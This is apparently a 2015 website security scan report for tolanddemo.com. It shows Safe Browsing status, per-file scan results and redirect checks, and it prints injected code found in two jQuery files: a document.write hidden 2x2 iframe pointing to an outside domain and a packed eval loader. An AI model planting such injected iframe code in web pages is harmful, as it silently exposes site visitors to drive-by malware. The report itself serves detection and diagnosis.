Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tolanddemo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tolanddemo.com/ | 200 OK Content-Length: 2731 Content-Type: text/html | clean |
http://tolanddemo.com/javascript/jquery.min.js | 200 OK Content-Length: 72331 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tapdestin.com/omzf.html?j=1488261></iframe>');
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f, e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tapdestin.com/omzf.html?j=1488261 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tapdestin.com/omzf.html?j=1488261> | ||
http://tolanddemo.com/javascript/lightbox/jquery.lightbox.min.js | 200 OK Content-Length: 14286 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tapdestin.com/omzf.html?j=1488261></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b', Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://tapdestin.com/omzf.html?j=1488261 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://tapdestin.com/omzf.html?j=1488261> | ||
http://tolanddemo.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tolanddemo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 09:59:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: tolanddemo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 09:59:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: tolanddemo.com
Referer: http://www.google.com/search?q=tolanddemo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tolanddemo.com
Referer: http://www.google.com/search?q=tolanddemo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.